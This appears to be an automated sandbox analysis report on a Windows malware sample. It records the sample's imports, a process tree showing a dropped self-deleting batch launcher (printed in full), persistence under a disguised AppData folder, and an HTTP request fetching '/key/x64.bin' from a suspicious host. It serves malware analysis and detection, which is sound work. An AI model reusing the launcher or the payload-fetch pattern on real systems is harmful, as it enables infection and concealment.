kernel32.dll.LoadLibraryA
kernel32.dll.lstrcmpiW
kernel32.dll.lstrcatW
kernel32.dll.DeleteFileW
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetFileAttributesW
kernel32.dll.SetWaitableTimer
kernel32.dll.GetModuleHandleA
kernel32.dll.HeapDestroy
kernel32.dll.GetCommandLineW
kernel32.dll.ExitProcess
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.WaitForSingleObject
kernel32.dll.CreateFileA
kernel32.dll.CreateEventA
kernel32.dll.GetVersion
kernel32.dll.lstrcmpA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileSize
kernel32.dll.FreeLibrary
kernel32.dll.lstrcpynA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.FindFirstFileA
kernel32.dll.CompareFileTime
kernel32.dll.GetModuleFileNameA
kernel32.dll.lstrcmpiA
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.LoadLibraryW
kernel32.dll.TerminateThread
kernel32.dll.GetVersionExW
kernel32.dll.VirtualAlloc
kernel32.dll.IsWow64Process
kernel32.dll.GetCurrentProcessId
kernel32.dll.CreateThread
kernel32.dll.OpenProcess
kernel32.dll.VirtualProtectEx
kernel32.dll.SuspendThread
kernel32.dll.ResumeThread
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.lstrlenA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.lstrcatA
kernel32.dll.lstrcpyA
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.LocalFree
kernel32.dll.SetEndOfFile
kernel32.dll.CreateDirectoryW
kernel32.dll.WriteFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.lstrcpyW
kernel32.dll.SetFilePointer
kernel32.dll.VirtualFree
user32.dll.DefWindowProcW
user32.dll.SendMessageW
user32.dll.GetSystemMetrics
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.SetClassLongW
user32.dll.SystemParametersInfoW
user32.dll.GetAncestor
user32.dll.GetWindowLongW
user32.dll.RegisterClassExW
user32.dll.GetForegroundWindow
user32.dll.TranslateMessage
user32.dll.GetMessageW
user32.dll.keybd_event
user32.dll.DestroyWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.DispatchMessageW
user32.dll.GetCursorInfo
advapi32.dll.OpenProcessToken
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegOpenKeyW
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.RegSetValueExW
advapi32.dll.RegOpenKeyA
advapi32.dll.RegCreateKeyA
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExW
advapi32.dll.RegSetValueExA
advapi32.dll.RegQueryValueExA
shell32.dll.#92
shell32.dll.ShellExecuteW
shell32.dll.ShellExecuteExW
ole32.dll.CoUninitialize
ole32.dll.CoInitializeEx
wintrust.dll.WinVerifyTrust
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.Wow64EnableWow64FsRedirection
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
oleaut32.dll.#9
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ntdll.dll.ZwWow64QueryInformationProcess64
ntdll.dll.ZwWow64ReadVirtualMemory64
ntdll.dll.strcpy
ntdll.dll.NtResumeProcess
ntdll.dll.NtSuspendProcess
ntdll.dll._snprintf
ntdll.dll._wcsupr
ntdll.dll._strupr
ntdll.dll.memmove
ntdll.dll.wcscpy
ntdll.dll.ZwQueryKey
ntdll.dll.wcstombs
ntdll.dll.RtlImageNtHeader
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.sprintf
ntdll.dll.wcscat
ntdll.dll.__C_specific_handler
ntdll.dll.__chkstk
kernel32.dll.GetComputerNameW
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.QueueUserWorkItem
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetLocalTime
kernel32.dll.RemoveDirectoryA
kernel32.dll.DeleteFileA
kernel32.dll.HeapReAlloc
kernel32.dll.GetCurrentThread
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.CopyFileW
kernel32.dll.GetCurrentThreadId
kernel32.dll.DuplicateHandle
kernel32.dll.SwitchToThread
kernel32.dll.MapViewOfFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.OpenWaitableTimerA
kernel32.dll.OpenMutexA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetVersionExA
kernel32.dll.InitializeCriticalSection
kernel32.dll.UnregisterWait
kernel32.dll.TlsGetValue
kernel32.dll.LoadLibraryExW
kernel32.dll.TlsSetValue
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.TlsAlloc
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateFileMappingA
kernel32.dll.OpenFileMappingA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.QueueUserAPC
kernel32.dll.OpenThread
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.CallNamedPipeA
kernel32.dll.WaitNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.GetOverlappedResult
kernel32.dll.DisconnectNamedPipe
kernel32.dll.CreateNamedPipeA
kernel32.dll.CancelIo
kernel32.dll.GetSystemTime
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.SleepEx
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.OpenEventA
kernel32.dll.LocalAlloc
kernel32.dll.RaiseException
kernel32.dll.FileTimeToSystemTime
kernel32.dll.DeleteCriticalSection
kernel32.dll.RemoveDirectoryW
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.SetFilePointerEx
kernel32.dll.GetFileAttributesW
oleaut32.dll.#8
oleaut32.dll.#2
oleaut32.dll.#6
advapi32.dll.GetUserNameA
psapi.dll.EnumProcessModules
shlwapi.dll.StrToIntExA
shlwapi.dll.StrTrimA
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpQueryOption
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
cryptnet.dll.CryptGetObjectUrl
cryptnet.dll.I_CryptNetGetConnectivity
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall3
cryptnet.dll.CryptRetrieveObjectByUrlW
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
devrtl.dll.DevRtlGetThreadLogToken
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
cabinet.dll.#23
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptSetHashParam
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptHashData
sechost.dll.QueryServiceConfigA
sechost.dll.QueryServiceStatus
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcStringFreeA
rpcrt4.dll.RpcBindingFree
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpCrackUrl
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
cryptbase.dll.SystemFunction036
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoTaskMemAlloc
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
ole32.dll.CoTaskMemFree
nsi.dll.NsiFreeTable
oleaut32.dll.#500
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpTimeFromSystemTime
winhttp.dll.WinHttpQueryHeaders
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpReadData
winhttp.dll.WinHttpCloseHandle
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
winhttp.dll.WinHttpSetStatusCallback
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
ole32.dll.CreateStreamOnHGlobal
crypt32.dll.CertFreeCertificateContext
user32.dll.GetShellWindow
ntdll.dll.RtlExitUserThread
kernel32.dll.CreateRemoteThread
advapi32.dll.GetUserNameW
ncrypt.dll.SslFreeObject
user32.dll.SetWindowsHookExA
user32.dll.RegisterClassA
user32.dll.CreateWindowExA
user32.dll.GetWindowLongPtrA
user32.dll.DefWindowProcA
user32.dll.SetWindowLongPtrA
user32.dll.SetClipboardViewer
user32.dll.IsClipboardFormatAvailable
user32.dll.GetClipboardOwner
user32.dll.RegisterDeviceNotificationA
user32.dll.GetMessageA
ws2_32.dll.#3
ncrypt.dll.SslDecrementProviderReferenceCount
ws2_32.dll.#116
"C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
C:\Windows\system32\svchost.exe
sneddddga
{2C15379C-9B8E-3EF3-8520-FF528954A3A6}
{C4CA9F68-5357-9674-FD38-372A81EC5BFE}

PE Information

Image Base 0x00400000
Entry Point 0x00405493
Reported Checksum 0x000578ee
Actual Checksum 0x000578ee
Minimum OS Version 5.1
Compile Time 2016-05-10 03:04:39
Import Hash cc79e5d1893e37143e121d47aeb51eb4

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00008212 0x00008400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.36
.data 0x0000a000 0x000006ca 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.64
.rsrc 0x0000b000 0x00045910 0x00045a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00

Imports

Library advapi32.dll:
0x402000 CryptSignHashA
0x402004 InitializeAcl
0x402008 RegReplaceKeyW
0x40200c RegSaveKeyA
0x402010 IsTextUnicode
0x402014 RegCreateKeyExA
0x402018 RegLoadKeyA
0x40201c LogonUserA
0x402020 RegEnumKeyA
0x402024 OpenEventLogW
0x402028 ReadEventLogA
0x40202c RegRestoreKeyA
0x402030 RegUnLoadKeyW
Library kernel32.dll:
0x402038 GetProcAddress
0x40203c OpenWaitableTimerW
0x402040 GetTempPathA
0x402044 CreateFileW
0x402048 GetCurrencyFormatA
0x40204c FindResourceExW
0x402050 IsBadWritePtr
0x402054 InterlockedExchange
0x402058 FindFirstFileW
0x40205c GetFullPathNameW
0x402060 GetProfileStringA
0x402064 GlobalAddAtomW
0x402068 LoadLibraryExA
0x40206c SetEvent
0x402070 GetModuleHandleA
0x402074 CreateMutexA
0x402078 GetPriorityClass
0x40207c ReadFile
0x402080 lstrcmp
0x402084 GetConsoleTitleA
0x402088 CreateFileMappingW
0x40208c ResumeThread
0x402090 OpenMutexA
0x402094 FormatMessageW
0x402098 CreateSemaphoreW
0x4020a8 GetConsoleAliasA
0x4020ac GetStartupInfoA
0x4020b0 ReadConsoleW
0x4020b8 FindNextFileA
Library mprapi.dll:
0x4020c0 MprInfoBlockAdd
0x4020c4 MprAdminDeviceEnum
0x4020c8 MprInfoBlockFind
Library crypt32.dll:
0x4020d0 CryptMemFree
0x4020d8 CertFindExtension
0x4020e0 CertCloseStore
0x4020e4 CryptFindOIDInfo
0x4020e8 CertControlStore
0x4020ec CertDuplicateStore
0x4020f0 CryptDecodeMessage
0x4020f8 CertGetNameStringA
0x402104 CertAlgIdToOID
0x402108 CryptMemAlloc
Library certcli.dll:
0x402110 CACloseCA
0x402114 CAEnumFirstCA

.text
`.data
.rsrc
OpenEventLogW
RegUnLoadKeyW
CryptSignHashA
ReadEventLogA
IsTextUnicode
RegRestoreKeyA
RegLoadKeyA
RegCreateKeyExA
LogonUserA
RegEnumKeyA
RegReplaceKeyW
InitializeAcl
RegSaveKeyA
advapi32.dll
FindFirstFileW
CreateSemaphoreW
LoadLibraryExA
lstrcmp
ReadFile
CreateFileMappingW
GetFullPathNameW
InterlockedExchange
ResumeThread
GetPriorityClass
GetStartupInfoA
CreateFileW
GetPrivateProfileIntA
FormatMessageW
GetConsoleAliasA
GlobalAddAtomW
GetCurrencyFormatA
InterlockedIncrement
GetProfileStringA
SetEvent
ReadConsoleW
GetConsoleTitleA
GetModuleHandleA
FindNextFileA
GetProcAddress
WaitForSingleObjectEx
GetLogicalDriveStringsW
CreateMutexA
FindResourceExW
OpenWaitableTimerW
IsBadWritePtr
GetTempPathA
OpenMutexA
kernel32.dll
MprInfoBlockAdd
MprAdminDeviceEnum
MprInfoBlockFind
mprapi.dll
CryptMemFree
CertDuplicateStore
CryptMemAlloc
CertAlgIdToOID
CertFindExtension
CryptDecodeMessage
CertDuplicateCRLContext
CertGetNameStringA
CryptBinaryToStringA
CertCompareCertificate
CryptFindOIDInfo
CertControlStore
CertDeleteCRLFromStore
CertCloseStore
CertCreateCRLContext
crypt32.dll
CAEnumFirstCA
CACloseCA
certcli.dll
gbycfilt.dll
egggeProcessMemory
ggrnel32.dll
ggapCreate
oruqvrjjmiprs
ernibkis
sneddddga
hokoa.pdb
This file is not on VirusTotal.

Process Tree

  • LjejZswGjULF7Ng.exe 420
    • cmd.exe 2872 cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
      • cmd.exe 992 cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
        • corrawex.exe 2512 "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
  • explorer.exe 1632

LjejZswGjULF7Ng.exe, PID: 420, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
Command Line: "C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe"
cmd.exe, PID: 2872, Parent PID: 420
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
cmd.exe, PID: 992, Parent PID: 2872
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
corrawex.exe, PID: 2512, Parent PID: 992
Full Path: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Command Line: "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
svchost.exe, PID: 2152, Parent PID: 2512
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 8.8.8.8 United States
N 23.202.161.73 United States
N 192.42.116.41 Netherlands
N 185.85.0.29 Germany
N 152.195.11.6 United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49188 152.195.11.6 www.download.windowsupdate.com 80
192.168.35.21 49230 152.195.11.6 www.download.windowsupdate.com 80
192.168.35.21 49182 185.85.0.29 www.php.net 80
192.168.35.21 49183 185.85.0.29 www.php.net 443
192.168.35.21 49225 185.85.0.29 www.php.net 80
192.168.35.21 49227 185.85.0.29 www.php.net 443
192.168.35.21 49226 192.42.116.41 groupcreatedt.at 80
192.168.35.21 49194 23.202.161.73 www.microsoft.com 80
192.168.35.21 49195 23.202.161.73 www.microsoft.com 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.php.net A 185.85.0.29
  CNAME www-php-net.ax4z.com
www.download.windowsupdate.com A 152.195.11.6
  CNAME 2-01-3cf7-0009.cdx.cedexis.net
  CNAME wu.ec.azureedge.net
  CNAME wu.wpc.apr-52dd2.edgecastdns.net
  CNAME cs611.wpc.edgecastcdn.net
  CNAME wu.azureedge.net
www.microsoft.com CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
  CNAME e13678.dspb.akamaiedge.net
  CNAME www.microsoft.com-c-3.edgekey.net
  A 23.202.161.73
groupcreatedt.at A 192.42.116.41

HTTP Requests

URI Data
http://www.php.net/license/3_0.txt
GET /license/3_0.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: www.php.net

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86403
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 19 Apr 2017 22:43:31 GMT
If-None-Match: "80ab755e5eb9d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 26 Feb 2020 21:39:14 GMT
If-None-Match: "06d5b30edecd51:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://groupcreatedt.at/key/x64.bin
GET /key/x64.bin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: groupcreatedt.at

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.35.21 49183 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
192.168.35.21 49227 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
File Size 322048 bytes
File Type raw G3 data, byte-padded
MD5 0df2d1c29bfee269b458a7ff8364f79f
SHA1 767a97336567afc966588a68aa161f4df29157ec
SHA256 db311c2cdda01c83e73585784a33c17d67a595110d860db83946a6c08113e348
CRC32 B78DED38
Ssdeep 6144:MoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:5TH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara
  • embedded_win_api - A non-Windows executable contains win32 API functions names
CAPE Yara None matched
File name D8E1.bat
Associated Filenames
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
File Size 110 bytes
File Type ASCII text, with CRLF line terminators
MD5 2d9ea84817b0c920856a5d7ce5ea2e6f
SHA1 0139fc1c7213d9ec8c2b782d55c9a8be24376913
SHA256 19d5cbc1efe7e24a43a4a9566d1800afc565ca3aaeb5711d0ddd3a7f38f8685f
CRC32 C9E62E24
Ssdeep 3:9G6OWRNfebnWdoe8JgU64vHXMJATkUElXUNVWdoZkwn:9NRMje87vvHXMJ2dkEnjiwn
ClamAV None
Yara None matched
CAPE Yara None matched
:13824657
if not exist %1 goto 4281142638
cmd /C "%1 %2"
if errorlevel 1 goto 13824657
:4281142638
del %0
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara None matched
CAPE Yara None matched
File name Cab5CB0.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
File Size 52608 bytes
File Type Microsoft Cabinet archive data, 52608 bytes, 1 file
MD5 ff9672cd98bf5d41722d2d1207344c67
SHA1 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
CRC32 2CA25202
Ssdeep 1536:hnbq9Gl2ifWyUQeydcYDAdN6CtfC8KAZc3kJTiD:hnbq9GQQW7NYDZCw5AZc3r
ClamAV None
Yara None matched
CAPE Yara None matched
File name Tar5CB1.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
File Size 125286 bytes
File Type data
MD5 8237156ad13c2cd7c5cc2faa6969fd86
SHA1 e5481457795650900ee04db955c87224e2db32f0
SHA256 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
CRC32 9C009AE7
Ssdeep 1536:oFAWrmqK1EYqbyr0CpXU4SwucWzvVPIM/P/CGv:oBK1LrVXPEcWOMP/D
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
File Size 57121 bytes
File Type Microsoft Cabinet archive data, 57121 bytes, 1 file
MD5 0ec1dc356bbe2c2cb76e83e51e54c290
SHA1 49b409e5df72dd6d43d6cff0940dcd7a0e9bf576
SHA256 47c69130af70998da627189acc578c2081ebc235eeb4c2c4fcd55e7126a13890
CRC32 E7C735A0
Ssdeep 1536:9ieuRGIYY2/h2OAdzzTP4Mq/HI8/E0IYeDFR3XaWs4:9eBV25Kzzr4zfIl0EDaH4
ClamAV None
Yara None matched
CAPE Yara None matched
